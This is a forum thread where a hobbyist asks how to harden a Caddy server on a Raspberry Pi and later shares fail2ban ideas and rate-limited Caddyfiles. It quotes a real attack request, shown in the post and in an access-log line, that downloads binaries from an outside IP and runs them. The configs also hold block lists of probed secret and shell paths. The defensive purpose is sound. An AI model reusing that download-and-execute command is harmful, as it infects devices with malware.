Request for advice on some server security hardening

Well this ended up being a much longer post than I anticipated. I can’t wait to immediately find a glaring mistake the moment after I press submit.

And yep, it had some very obvious mistakes... cleaned up a little bit at least, and added an extra edit below too.

1. The problem I’m having:

I realize that what I'm asking for help with is not some silver bullet of a hardened Caddy server, so please keep that in mind. That would be cool, but this is more of an "academic" exercise, as well as an "oh, you want to be a jerk and try to hack my server?!? Well, I can be a jerk too!" kind of thing. One thing has led to another, and I'm not ready to say I've done enough and move on from this side quest just yet.

Where I'm at: I'm running Caddy v2.9.1 on a Raspberry Pi 4B with these modules (not all of them are in use currently, but they're there):

caddy.logging.encoders.transform
dns.providers.cloudflare
http.authentication.providers.authorizer
http.handlers.authenticator
http.ip_sources.cloudflare
security

Currently, I have a growing set of paths that people who are obviously up to no good love poking at via my IP address (not the actual domain I have set up). So I set up fail2ban to block them for a while if they look too hard where they have no business looking. Just so we're all clear: there isn't anything where they're looking, and even if there were, they would be very disappointed with whatever prize they think is behind the door.

This server is really only for me, and through hard work and a series of silly/bad decisions, it's ready to be torn down and rebuilt at any moment without any issues, since I finally picked up Ansible along the way too (well enough, at least). No backups or anything like that, even. It's that kind of project (for now, at least) and it's fun, so all is good.

So there I was last night, admiring what I had finally accomplished: auto-blocking those jerks at a low level. It's not really anything special or mind-blowing. The only access to this whole Pi server is through the two ports I had to open up on my router for Caddy anyway. It just makes me laugh thinking there are a handful (dozens of them!) of people out there potentially thinking, "we got another target, guys! ...wait, wtf, he blocked me!"

I swear I had been in a state of “doneness” for like 20 minutes when I looked at the logs only to see a large number of

TLS handshake error from aaa.bbb.ccc.ddd:xxxx: EOF

log messages just pouring in from many different IP addresses. That shouldn't be happening to this random guy playing around with his Raspberry Pi in the dark recesses of the internet! Seems like they got me this time. Jerks! I just unplugged for the night, and upon review this morning: someone had sent my server a malicious request, and seconds later those handshake errors started flooding in from all over. In total, about 2,500 handshake errors in roughly 10 minutes before I disconnected.

It was a GET request to (formatted for legibility):

/shell?
killall+-9+arm7;
killall+-9+arm4;
killall+-9+arm;
killall+-9+/bin/sh;
killall+-9+/bin/sh;
killall+-9+/z/bin;
killall+-9+/bin/bash;
cd+/tmp;
rm+arm4+efefa7;
wget+http://176.65.134.201/efefa7;
chmod+777+efefa7;
./efefa7+jaws;
wget+http://176.65.134.201/drea4;
chmod+777+drea4;
./drea4+jaws

While I have questions about how a GET request to the endpoint in question could cause so much havoc, this link seems to describe the culprit: "Automated Malware Analysis Report for drea4.elf - Generated by Joe Sandbox". I don't hang out in that community, so apologies if it's not the best source, but it describes the same things I witnessed. I was also unable to reach the IP addresses from the request this morning, once I finally realized what that thing was trying to do.

Would Caddy even try to run something like that? The site behind the IP address that request went to is literally just a one-pager from a template I settled on after some searching around. There's no programming going on behind the scenes other than what Caddy itself is doing to serve it. There are projects on the Pi that Caddy fronts which do their programming things, just not the project immediately related to this post.

Still here? OK, so I'm in a situation I wouldn't have thought possible 24 hours ago, and I refuse to give up!

I see two routes I could pursue and I’m not sure which is best given what I currently know, so here is a long message about it all. If there are any other potential routes to proceed down, feel free to suggest anything that you think makes more sense.

Option 1: I would like to keep fail2ban as the keeper of IP address blocking, since that's its only job. At least one person somewhere on the internet has pointed out that since blocking isn't Caddy's primary job, it makes sense not to make Caddy fully responsible for it either. I agree, and I also wanted to add more bells and whistles to my setup.

Again, I'm well aware that this is not some kind of impenetrable shield I'm attempting to build here. I mostly just want to have fun while adding at least a sliver of extra protection.

The general idea: when someone makes a request with "shell" in it (there are other, more benign-looking ones, but no leeway for any of them now!), immediately ban after the first attempt for a good length of time. After that event, place the Caddy server in a kind of heightened-alert mode that will then also start immediately banning IP addresses that are generating the TLS handshake errors. I didn't crunch the numbers, but a cursory look seems to suggest this will at least help a little.
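To make the first part concrete, here is the rough shape I'm picturing for the filter/jail pair. This is only a sketch: the file names and thresholds are placeholders, and the failregex/datepattern assume fail2ban is watching one of the transform-formatted sus logs from my config below (like connect_to_ip.log), so both would likely need tuning.

# /etc/fail2ban/filter.d/caddy-sus.conf (hypothetical name)
[Definition]
# Match a transform-formatted line whose uri contains "shell" and
# capture the client IP, e.g.:
# 2025/03/28 12:34:56.789[remote_ip|...][client_ip|1.2.3.4]...[uri|/shell?...]...
failregex = \[client_ip\|<HOST>\].*\[uri\|[^\]]*shell
# time_format wall_milli puts a YYYY/MM/DD HH:MM:SS.mmm timestamp up front
datepattern = ^%%Y/%%m/%%d %%H:%%M:%%S

# /etc/fail2ban/jail.d/caddy-sus.local (hypothetical name)
[caddy-sus]
enabled  = true
filter   = caddy-sus
logpath  = /var/log/caddy/connect_to_ip.log
port     = http,https
maxretry = 1
findtime = 10m
bantime  = 24h

With maxretry = 1, the first matching request triggers the ban, which is the "no leeway" part. The "heightened alert" second stage is the piece I haven't figured out yet.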

Problems here, though: those logs are at the debug level, and fail2ban is pretty clear that you shouldn't feed it debug-level logging because it could get into some recursive situation. I don't know enough myself to confirm whether that matters here. Also, I'd want to isolate those logs away from the main access.json log to make things easier for fail2ban to deal with (performance as well as signal-to-noise ratio). It's also not yet clear to me how to capture, reformat, and redirect those "http.stdlib" log messages. Even if this isn't the right play here, I'm still curious how I could do that for whatever reason I dream up next. Any ideas?
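The closest I've come so far is a named log in the global options with an include filter on that logger namespace, something like this (untested; the log name and file path are just placeholders):

{
	log stdlib_split {
		include http.stdlib
		output file /var/log/caddy/tls_handshake.log
		format json
		level DEBUG
	}
}

The level would have to stay at DEBUG for those handshake messages to show up at all, and the default log would probably also need an exclude http.stdlib to keep duplicates out.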

Option 2 seems to be GitHub - mholt/caddy-l4: Layer 4 (TCP/UDP) app for Caddy, which looks like it has what I'm looking for. I know enough to know that it appears to be the other thing to look into before going down any other rabbit holes. Am I right in that respect? Any pointers to make getting started go a little faster?
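From skimming its README, the JSON config shape looks roughly like this skeleton (based on a quick read only; the listen address and upstream are made up, and I haven't tested any of it):

{
	"apps": {
		"layer4": {
			"servers": {
				"example": {
					"listen": [":8443"],
					"routes": [
						{
							"match": [{ "tls": {} }],
							"handle": [
								{
									"handler": "proxy",
									"upstreams": [{ "dial": ["localhost:443"] }]
								}
							]
						}
					]
				}
			}
		}
	}
}

The appeal for my case would be getting a hook at the raw connection level, before the TLS handshake even happens.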

I'm still new to all this Caddy stuff, and it seemed like I'd reached the point where getting the advice and recommendations of those who have been around this stack for a while was a good play. So here I am. Hooray! Thoughts? Criticisms? Concerns? Other ideas or directions worth knowing about or looking at?

2. Error messages and/or full log output:

Because you insist, here are the logs from around when the incident happened. Also, that user-agent was not modified by me. What a joker, "KrebsOnSecurity", haha!

{"level":"debug","ts":1743133375.275426,"logger":"http.stdlib","msg":"http: TLS handshake error from 172.71.150.158:55139: EOF"}
{"level":"debug","ts":1743133375.3402927,"logger":"http.stdlib","msg":"http: TLS handshake error from 172.71.150.158:38793: EOF"}
{"level":"debug","ts":1743133375.404855,"logger":"http.stdlib","msg":"http: TLS handshake error from 172.71.150.158:49119: EOF"}
{"level":"info","ts":1743133409.019054,"logger":"http.log.access","msg":"handled request","request":{"remote_ip":"141.98.11.27","remote_port":"48758","client_ip":"141.98.11.27","proto":"HTTP/1.1","method":"GET","host":"73.44.80.71:80","uri":"/shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+arm4+efefa7;wget+http:/\\/176.65.134.201/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\\/176.65.134.201/drea4;chmod+777+drea4;./drea4+jaws","headers":{"Accept":["text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"],"Accept-Encoding":["gzip, deflate"],"Accept-Language":["en-US,en;q=0.9"],"Connection":["keep-alive"],"Cache-Control":["max-age=0"],"User-Agent":["KrebsOnSecurity"]}},"bytes_read":0,"user_id":"","duration":0.000070981,"size":0,"status":308,"resp_headers":{"Server":["Caddy"],"Connection":["close"],"Location":["https://73.44.80.71/shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+arm4+efefa7;wget+http:/\\/176.65.134.201/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\\/176.65.134.201/drea4;chmod+777+drea4;./drea4+jaws"],"Content-Type":[]}}
{"level":"debug","ts":1743133416.8338058,"logger":"http.stdlib","msg":"http: TLS handshake error from 162.158.98.141:15651: EOF"}
{"level":"debug","ts":1743133416.8857992,"logger":"http.stdlib","msg":"http: TLS handshake error from 162.158.98.141:28987: EOF"}
{"level":"debug","ts":1743133416.9374268,"logger":"http.stdlib","msg":"http: TLS handshake error from 162.158.98.141:18445: EOF"}
{"level":"debug","ts":1743133416.9876194,"logger":"http.stdlib","msg":"http: TLS handshake error from 162.158.98.141:19959: EOF"}
{"level":"debug","ts":1743133417.0401726,"logger":"http.stdlib","msg":"http: TLS handshake error from 162.158.98.141:52527: EOF"}
{"level":"debug","ts":1743133419.0467026,"logger":"http.stdlib","msg":"http: TLS handshake error from 172.70.176.48:38007: EOF"}

3. Caddy version:

v2.9.1 h1:OEYiZ7DbCzAWVb6TNEkjRcSCRGHVoZsJinoDR/n9oaY=
dan@pi:~ $ uname -a
Linux pi 6.6.74+rpt-rpi-v8 #1 SMP PREEMPT Debian 1:6.6.74-1+rpt1 (2025-01-27) aarch64 GNU/Linux

The additional installed modules are listed above as well.

4. How I installed and ran Caddy:

xcaddy build --with github.com/caddy-dns/cloudflare --with github.com/caddyserver/transform-encoder --with github.com/WeidiDeng/caddy-cloudflare-ip --with github.com/greenpau/caddy-security

which eventually produced the binary below (note the file size):

-rwxrwxr-x  1 dan  dan  56819896 Mar 19 06:00 caddy_cloudflare_transform-encoders_cloudflare-ip_security

then I moved it here (again, note the matching file size):

dan@pi:~/sandbox $ ls -al /usr/bin/ | grep caddy
-rwxr-xr-x  1 root root    56819896 Mar 19 06:32 caddy
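
As a sanity check that the moved binary really is the custom build, listing its modules shows the extras:

dan@pi:~/sandbox $ caddy list-modules | grep cloudflare
dns.providers.cloudflare
http.ip_sources.cloudflare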

a. System environment:

Raspberry Pi 4B, running Debian trixie rather than bookworm. No containers here. Also, who knew doing things the "simple" way would be way more complicated and time-consuming?

dan@pi:~/sandbox $ uname -a
Linux pi 6.6.74+rpt-rpi-v8 #1 SMP PREEMPT Debian 1:6.6.74-1+rpt1 (2025-01-27) aarch64 GNU/Linux

dan@pi:~/sandbox $ sudo systemctl status caddy --no-pager --full
● caddy.service - Caddy
     Loaded: loaded (/usr/lib/systemd/system/caddy.service; enabled; preset: enabled)
     Active: active (running) since Fri 2025-03-28 02:29:37 CDT; 10h ago
 Invocation: 2a88964d75894827b1c815160f5486c1
       Docs: https://caddyserver.com/docs/
    Process: 7360 ExecReload=/usr/bin/caddy reload --config /etc/caddy/Caddyfile --force (code=exited, status=0/SUCCESS)
   Main PID: 785 (caddy)
      Tasks: 18 (limit: 8752)
        CPU: 20.785s
     CGroup: /system.slice/caddy.service
             └─785 /usr/bin/caddy run --environ --config /etc/caddy/Caddyfile

Mar 28 08:45:22 pi systemd[1]: Reloading caddy.service - Caddy...
Mar 28 08:45:23 pi caddy[7126]: {"level":"info","ts":1743169523.1853957,"msg":"using config from file","file":"/etc/caddy/Caddyfile"}
Mar 28 08:45:23 pi caddy[7126]: {"level":"info","ts":1743169523.2041965,"msg":"adapted config to JSON","adapter":"caddyfile"}
Mar 28 08:45:23 pi caddy[7126]: {"level":"warn","ts":1743169523.2042677,"msg":"Caddyfile input is not formatted; run 'caddy fmt --overwrite' to fix inconsistencies","adapter":"caddyfile","file":"/etc/caddy/Caddyfile","line":105}
Mar 28 08:45:23 pi systemd[1]: Reloaded caddy.service - Caddy.
Mar 28 09:01:34 pi systemd[1]: Reloading caddy.service - Caddy...
Mar 28 09:01:34 pi caddy[7360]: {"level":"info","ts":1743170494.731064,"msg":"using config from file","file":"/etc/caddy/Caddyfile"}
Mar 28 09:01:34 pi caddy[7360]: {"level":"info","ts":1743170494.7477531,"msg":"adapted config to JSON","adapter":"caddyfile"}
Mar 28 09:01:34 pi caddy[7360]: {"level":"warn","ts":1743170494.7478254,"msg":"Caddyfile input is not formatted; run 'caddy fmt --overwrite' to fix inconsistencies","adapter":"caddyfile","file":"/etc/caddy/Caddyfile","line":105}
Mar 28 09:01:34 pi systemd[1]: Reloaded caddy.service - Caddy.

The caddy fmt --overwrite command was eventually run, so you can ignore those warnings.

b. Command:

I don't understand what this is asking for that isn't already provided elsewhere here. It sounds a bit condescending, if you ask me, lol.

c. Service/unit/compose file:

dan@pi:~/sandbox $ cat /usr/lib/systemd/system/caddy.service
# caddy.service
#
# For using Caddy with a config file.
#
# Make sure the ExecStart and ExecReload commands are correct
# for your installation.
#
# See https://caddyserver.com/docs/install for instructions.
#
# WARNING: This service does not use the --resume flag, so if you
# use the API to make changes, they will be overwritten by the
# Caddyfile next time the service is restarted. If you intend to
# use Caddy's API to configure it, add the --resume flag to the
# `caddy run` command or use the caddy-api.service file instead.

[Unit]
Description=Caddy
Documentation=https://caddyserver.com/docs/
After=network.target network-online.target
Requires=network-online.target

[Service]
Type=notify
User=caddy
Group=caddy
ExecStart=/usr/bin/caddy run --environ --config /etc/caddy/Caddyfile
ExecReload=/usr/bin/caddy reload --config /etc/caddy/Caddyfile --force
EnvironmentFile=/var/lib/caddy/.local/share/caddy/env
TimeoutStopSec=5s
LimitNOFILE=1048576
PrivateTmp=true
ProtectSystem=full
AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE

[Install]
WantedBy=multi-user.target

d. My complete Caddy config:

{
	debug
	default_sni danengle.dev
	acme_dns cloudflare slkdlksflklkksflsdj
	log {
		output file /var/log/caddy/access.json {
			roll_size 500MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
	}
	servers {
		trusted_proxies cloudflare {
			interval 12h
			timeout 15s
		}
		client_ip_headers Cf-Connecting-Ip
	}
}

# Not my favorite block of code, but making it work took priority at the time.
# So this is a no-judgement zone! Suggestions welcome; I know what I've done.
# Also, this is not the main focus right now; the mostly-duplicated block toward
# the bottom of the file is. You will probably notice these snippets are imported
# in odd places. That's because a location would make sense while things were
# working, then stop making sense when they misbehaved, and eventually I didn't
# need to move them to figure anything out, so they stayed where they were last
# placed. Also, for these to work properly I still need to figure out how to
# handle the Cloudflare proxy client_ip/request_ip header things, which I was
# unaware of when these were first constructed.
(sus_paths) {
	@not_sus {
		path /
		path /_next/static/chunks/*
		path /favicon.ico
		not {
			path /.env
			path /.env.*
			path /.git/*
			path /wp-config.php
			path /config.php
			path /wp-admin/*
			path /administrator/*
			path /vendor/*
			path /*connector.php
			path /*wmanifest.xml
			path /.aws/credentials
			path /php_info.php
			path /debug.php
			path /status.php
			path /info.php
			path /php.php
			path /backup
			path /wordpress
			path /portal
			path /demo
			path /cms
		}
	}
	@sus {
		path /.env
		path /.env.*
		path /.git/*
		path /wp-config.php
		path /config.php
		path /wp-admin/*
		path /administrator/*
		path /vendor/*
		path /*connector.php
		path /*wmanifest.xml
		path /.aws/credentials
		path /php_info.php
		path /debug.php
		path /status.php
		path /info.php
		path /php.php
		path /backup
		path /wordpress
		path /portal
		path /demo
		path /cms
		path /next.config.js
	}
	# log_skip @not_sus
	log @sus {
		output file /var/log/caddy/security_blocks.log {
			roll_size 500MB
			roll_keep 5
			roll_keep_for 720h
		}
		format transform "{ts}|[remote|{request>remote_ip}][client|{request>client_ip}][meth|{request>method}][host|{request>host}][uri|{request>uri}][status|{status}]" {
			time_format wall_milli
		}
		level INFO
	}
	handle @sus {
		respond "Access Denied" 403
	}
}
danengle.dev {
	tls {
		dns cloudflare slkslksslkjsdf
	}

	import sus_paths danengle.dev

	log {
		output file /var/log/caddy/dashboard-dev.access.json {
			roll_size 1gb
			roll_keep 5
			roll_keep_for 720h
		}
		format json
		level DEBUG
	}
	encode zstd gzip
	file_server
	reverse_proxy localhost:3035
}

*.danengle.dev {
	tls {
		dns cloudflare sljhsfdsfdihsf
	}

	import sus_paths star.danengle.dev

	log {
		# There will eventually be another reverse_proxy here...
		# Not sure how to move away from this generic "star" named log.
		# It gets the job done just fine currently, so it's still here like this.
		output file /var/log/caddy/star.access.json {
			roll_size 1gb
			roll_keep 5
			roll_keep_for 720h
		}
		format json
		level DEBUG
	}

	@umami host umami.danengle.dev
	handle @umami {
		encode zstd gzip
		file_server
		reverse_proxy localhost:3333
	}
}

pihole.local {
	log {
		output file /var/log/caddy/pihole.access.json {
			roll_size 1gb
			roll_keep 5
			roll_keep_for 720h
		}
		format json
	}
	encode zstd gzip
	file_server
	reverse_proxy localhost:8080
}

pi.local {
	root * /var/www/pi-home
	log {
		output file /var/log/caddy/pi-home.access.json {
			roll_size 1gb
			roll_keep 5
			roll_keep_for 720h
		}
		format json
	}
	# For the goaccess log viewer, so pi.local/logs updates in realtime.
	# I just threw it here at the time to test things out and haven't decided
	# whether to move it to a more appropriate place yet.
	@websockets {
		header Connection *Upgrade*
		header Upgrade websocket
	}
	reverse_proxy @websockets localhost:7890
	encode zstd gzip
	import sus_paths pi.local
	file_server
}

# Left this here but it's no longer in use since the main ip address based config below took over
direct.local {
	root * /var/www/ip-direct-home
	log {
		output file /var/log/caddy/ip-direct-home.access.json {
			roll_size 1gb
			roll_keep 5
			roll_keep_for 720h
		}
		format json
	}
	encode zstd gzip
	import sus_paths ip-direct.local
	file_server

	handle_errors 404 {
		rewrite * /404.html
		file_server
	}
}
s3.garage.local, *.s3.garage.local {
	log {
		output file /var/log/caddy/s3.garage.access.json {
			format json
			roll_size 1gb
			roll_keep 5
			roll_keep_for 720h
		}
	}
	reverse_proxy localhost:3900 {
	}
}

web.garage.local {
	reverse_proxy localhost:3902 {
	}
}

admin.garage.local {
	reverse_proxy localhost:3903 {
	}
}
http://73.44.80.71, https://73.44.80.71 {
	tls internal

	root * /var/www/ip-direct-home

	@not_susss {
		path /
		path /favicon.ico
		path /.well-known/*
		path /robots.txt
		path /assets/css/*
	}
	# There has got to be a better "caddy" way of doing this...
	# Also, I just added paths as they appeared in logs and haven't
	# gone back yet for cleanup/refactor/simplification.
	@susss {
		path /.env
		path /*/.env
		path /*.env*
		path /.git/*
		path /.git/config*
		path /*/.git/config
		path /wp-config.php
		path /config.php
		path /wp-admin/*
		path /administrator/*
		path /vendor/*
		path /*connector.php
		path /*wmanifest.xml
		path /.aws/credentials
		path /credentials*
		path /*routes
		path /php_info.php
		path /debug.php
		path /status.php
		path /info.php
		path /php.php
		path /*/eval-stdin.php
		path /backup
		path /wordpress
		path /portal
		path /demo
		path /cms
		path /next.config.js
		path /form.html
		path /geopip/
		path /*password.php
		path /*.php
		path /geoserver*
		path /phpmyadmin
		path /*phpstorm
		path /cgi-bin*
		path /cgi-bin/*bin*
		path /*invokefunction*
		path /login.rsp
		path /device.rsp*
		path /*login.esp
		path /*formLogin*
		path /*/login
		path /login
		path /*/exporttool/*
	}

	log

	log @susss {
		output file /var/log/caddy/connect_to_ip.log {
			roll_size 500MB
			roll_keep 5
			roll_keep_for 720h
		}
		format transform "{ts}[remote_ip|{request>remote_ip}][client_ip|{request>client_ip}][method|{request>method}][host|{request>host}][uri|{request>uri}][status|{status}]" {
			time_format wall_milli
		}
		level INFO
	}

	log_skip @not_susss

	handle @susss {
		respond "Access Denied" 403
	}

	encode zstd gzip
	file_server

	handle_errors 404 {
		rewrite * /404.html
		file_server
	}
}

Edit: Updated the IP address site block to include both the http:// and https:// versions. That stops many of the 308 responses in the logs. It makes sense after the fact; just a little detail that escaped me while getting this all up and going.

Other cleanup is also in progress, but I don't want to deal with copy/pasting it in here right now.

5. Links to relevant resources:

I guess I might as well paste links to the fail2ban material I've been using. Honestly, it seems not quite sufficient to me, but that could just be the newness of getting into the nitty-gritty of it all.
https://fail2ban.readthedocs.io/en/latest/index.html

https://github.com/fail2ban/fail2ban/wiki

Thanks for taking the time to get this far!

Honestly, I skimmed the long post. It’s too long :slight_smile:

You're thinking and worrying too much. Caddy will not serve, let alone execute, any of the stuff listed in @susss unless it's under the path specified in the root directive, which by definition should only contain public files. Caddy doesn't execute random commands received from random clients.


You are correct on all counts @Mohammed90 !

To follow up in case anyone ever ends up here... I'm chalking my kneejerk reaction up to just that. I did have fail2ban working, but eventually decided it isn't necessary.

For one, effectively blocking anyone on the actual DNS routes would require interacting with the Cloudflare API. Those requests arrive from Cloudflare IP addresses, so it wouldn't make sense to block a Cloudflare edge IP that is forwarding requests for many different users. Cloudflare does send the real client IP in the headers, so it is actionable, just not worth the effort for me. The docs I found made it seem simple, but I wasn't able to get it working in an acceptable way in the short amount of time I looked into it. Plus, ensuring the bans stay synchronized is just another layer of stuff I don't care to worry about right now.
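For anyone curious, the call itself looked simple enough in the docs, roughly something like this sketch (the zone ID, token, and IP are placeholders):

# Block a single client IP zone-wide via Cloudflare's IP Access Rules API
curl -X POST "https://api.cloudflare.com/client/v4/zones/$ZONE_ID/firewall/access_rules/rules" \
  -H "Authorization: Bearer $CLOUDFLARE_API_TOKEN" \
  -H "Content-Type: application/json" \
  --data '{"mode":"block","configuration":{"target":"ip","value":"203.0.113.7"},"notes":"banned by fail2ban"}'

Unbanning means a DELETE against the rule ID that comes back, and keeping that bookkeeping synchronized with fail2ban is exactly the layer I decided to skip.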

I still want to return "Access Denied" responses for certain requests, and I've added the rate_limit module as well. It's enough of a "pain in the butt" barrier for me. Below is a genericized and slightly simplified version of my current Caddyfile. Hopefully it'll help someone down the road.

# The command I used for creating the caddy bin that is running everything
# defined below was:
# CADDY_VERSION=v2.10.0-beta.4.0.20250329141543-5a6b2f8d1d46 xcaddy build \
#   --with github.com/caddy-dns/cloudflare \
#   --with github.com/caddyserver/transform-encoder \
#   --with github.com/WeidiDeng/caddy-cloudflare-ip \
#   --with github.com/greenpau/caddy-security \
#   --with github.com/mholt/caddy-events-exec \
#   --with github.com/dunglas/mercure \
#   --with github.com/mholt/caddy-l4 \
#   --with github.com/mholt/caddy-ratelimit
# The CADDY_VERSION variable was determined by what mholt/caddy-events-exec said
# it required; the build errored on that when I attempted to run the xcaddy
# build command with the regular v2.9.1 caddy installed.
#
# As of 2025-04-14, the CADDY_VERSION is still the one caddy-events-exec wants.
# The created caddy binary stands at 59M in size on my raspberry pi 4B with
# go version go1.24.2 linux/arm64
#
# I have not gotten around to exploring mercure or caddy-l4 modules yet
# so nothing they provide is shown below. Probably someday, just not today.
#
{
	debug
	# https://caddyserver.com/docs/json/apps/http/servers/tls_connection_policies/default_sni/
	default_sni example.dev
	# For those using cloudflare stuff
	# https://github.com/caddy-dns/cloudflare
	acme_dns cloudflare {$CLOUDFLARE_DNS_API_TOKEN}
	# Logs all the stuff, which includes things like (with debug enabled)
	# "logger":"tls.cache","msg":"added certificate to cache"
	log {
		output file /var/log/caddy/access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
	}
	# I was experimenting with mail server stuff, and some of it wanted certs in
	# specific locations with specific ownership, so the idea here was to create
	# a mail.example.dev route block and have caddy manage creating and updating
	# them. I haven't yet fully committed to any specific mail setup or determined
	# the best way to ensure the correct ownership and movement of the certs for
	# those applications, so this doesn't really do anything useful for me
	# currently. Leaving it here for a fuller example.
	events {
		on cert_obtained exec /var/lib/caddy/.local/share/caddy/sandbox/certs.sh {event.data.identifier} {event.data.issuer} {event.data.certificate_path} {event.data.metadata_path} {event.data.private_key_path} {event.data.renewal}
	}
	# More cloudflare stuff. Have to have built caddy with https://github.com/WeidiDeng/caddy-cloudflare-ip
	servers {
		trusted_proxies cloudflare {
			interval 12h
			timeout 15s
		}
		client_ip_headers Cf-Connecting-Ip
	}
}
# Shared block to return "Access Denied" responses to things normal people
# wouldn't be looking for. I don't know for sure if this is correct, but it
# seems like it probably is: the paths are ordered so that more specific paths
# should match first and return early before hitting the more general * paths,
# which in theory should be better for performance. The paths were generated
# from observed connections to my server, so there wasn't any exact method to
# it. Just observe, react, and eventually end up with this.
(susser) {
	@sus {
		path /.env
		path /.git/config
		path /wp-config.php
		path /config.php
		path /.aws/credentials
		path /password.php
		path /next.config.js
		path /backup
		path /demo
		path /form.html
		path /geopip/
		path /geoip/
		path /login.rsp
		path /phpmyadmin
		path /portal
		path /wordpress
		path /Admin*
		path /administrator*
		path /cgi-bin*
		path /credentials*
		path /device.rsp*
		path /geoserver*
		path /hello.world*
		path /HNAP1/*
		path /php-cgi*
		path /plugins*
		path /shell*
		path /solr*
		path /odinhttpc*
		path /vendor*
		path /wp-admin*
		path /.vscode*
		path /*.env
		path /*aspx
		path /*composer.json
		path /*connector.php
		path /*eval-stdin.php
		path /*first.txt
		# Not sure exactly why, but paths such as /core/.git/config were getting
		# past when just /*git/config was specified
		path /*git/config
		path /*/.git/config
		path /*javascript.html
		path /*login.esp
		path /*man.txt
		path /*mij.txt
		path /*overview.js
		path /*panel.txt
		path /*password.php
		path /*phpstorm
		path /*routes
		path /*uitleg.txt
		path /*wmanifest.xml
		path /*bin/sh*
		path /*.env*
		path /*git/config*
		path /*disable_function*
		path /*wp-admin/*
		path /*vendor/phpunit*
		path /*phpunit/phpunit*
		path /*exporttool*
		path /*invokefunction*
		path /*formLogin*
	}

	log sus.log {
		output file /var/log/caddy/sus.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		no_hostname
		format filter {
			# Don't include parts that don't seem necessary for this use case;
			# it keeps the file sizes smaller.
			fields {
				request>remote_port delete
				request>proto delete
				request>headers>Connection delete
				request>headers>Upgrade-Insecure-Requests delete
				request>headers>Pragma delete
				request>headers>Cf-Visitor delete
				request>headers>Cdn-Loop delete
				request>headers>Accept-Encoding delete
				request>headers>X-Forwarded-Proto delete
				request>headers>Cache-Control delete
				request>headers>Sec-Gpc delete
				request>tls>resumed delete
				request>tls>proto delete
				resp_headers>Alt-Svc delete
				resp_headers>Content-Type delete
			}
			wrap json
		}
		level INFO
	}
	handle @sus {
		log_name sus.log
		respond "Access Denied" 403
	}
}
(rate_limit_logger) {
	log rate_limit.log {
		output file /var/log/caddy/rate_limit.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		no_hostname
		format filter {
			fields {
				request>remote_port delete
				request>proto delete
				request>headers>Connection delete
				request>headers>Upgrade-Insecure-Requests delete
				request>headers>Pragma delete
				request>headers>Cf-Visitor delete
				request>headers>Cdn-Loop delete
				request>headers>Accept-Encoding delete
				request>headers>X-Forwarded-Proto delete
				request>headers>Cache-Control delete
				request>headers>Sec-Gpc delete
				request>tls>resumed delete
				request>tls>proto delete
				resp_headers>Alt-Svc delete
				resp_headers>Content-Type delete
			}
			wrap json
		}
		level DEBUG
	}
	handle_errors 429 {
		log_name rate_limit.log
	}
}
example.dev {
	tls {
		dns cloudflare {$CLOUDFLARE_DNS_API_TOKEN}
	}
	import susser
	# Using https://github.com/mholt/caddy-ratelimit for rate limiting.
	# If rate limits start getting hit and the paths fall into sus territory,
	# the rate_limit will block before the sus path can be handled.
	# Specific events and windows were just chosen by feel at this point.
	import rate_limit_logger
	rate_limit {
		zone static_example {
			match {
				method GET
			}
			key static
			events 120
			window 30s
		}
		zone dynamic_example {
			key {remote_host}
			events 14
			window 6s
		}
		log_key
		jitter 0.75
	}
	log {
		output file /var/log/caddy/example.dev.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
		level INFO
	}
	encode zstd gzip
	file_server
	reverse_proxy localhost:3035
}
# This route may eventually serve mail via a web interface, but it
# was created initially so caddy would create and manage certs for the uri.
mail.example.dev {
	tls {
		dns cloudflare {$CLOUDFLARE_DNS_API_TOKEN}
	}
	root * /var/www/mail.example.dev
	import susser
	import rate_limit_logger
	rate_limit {
		zone static_mail {
			match {
				method GET
			}
			key static
			events 120
			window 30s
		}
		zone dynamic_mail {
			key {remote_host}
			events 18
			window 6s
		}
		log_key
	}
	log {
		output file /var/log/caddy/mail.example.dev.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
		level INFO
	}
	encode zstd gzip
	file_server
}

*.example.dev {
	tls {
		dns cloudflare {$CLOUDFLARE_DNS_API_TOKEN}
	}
	import susser
	import rate_limit_logger
	rate_limit {
		zone static_star {
			match {
				method GET
			}
			key static
			events 200
			window 30s
		}
		zone dynamic_star {
			key {remote_host}
			events 24
			window 6s
		}
		log_key
	}
	log {
		output file /var/log/caddy/star.example.dev.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
		level INFO
	}
	# Using https://umami.is/docs for some event tracking. The app itself is
	# a nextjs application.
	@umami host umami.example.dev
	handle @umami {
		encode zstd gzip
		file_server
		reverse_proxy localhost:3333
	}
}
# Basic https://pi-hole.net/ install. Other than customizing some settings
# post install, just ran the basic installer for system level items
pihole.internal {
	log {
		output file /var/log/caddy/pihole.internal.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
		level INFO
	}
	encode zstd gzip
	file_server
	reverse_proxy localhost:8080
}
# Content here is a simple template from https://html5up.net/. A /var/www/pi.internal/logs
# directory was created for viewing the output from a goaccess instance set up according to
# https://goaccess.io/get-started. Run that with something like
# /usr/local/bin/goaccess \
#   /var/log/caddy/example.dev.access.json \
#   .../other/log/files... \
#   -o /var/www/pi.internal/logs/index.html \
#   --log-format=CADDY \
#   --real-time-html \
#   --ws-url=pi.local:443
# The global access.json log file should not be included in the list because
# other log types can cause errors. The websockets directive is there specifically
# for goaccess realtime updates. I don't leave goaccess running and just turn it
# on and off with systemctl as needed.
pi.internal {
	root * /var/www/pi.internal
	log {
		output file /var/log/caddy/pi.internal.access.json {
			roll_size 50MB
			roll_keep 10
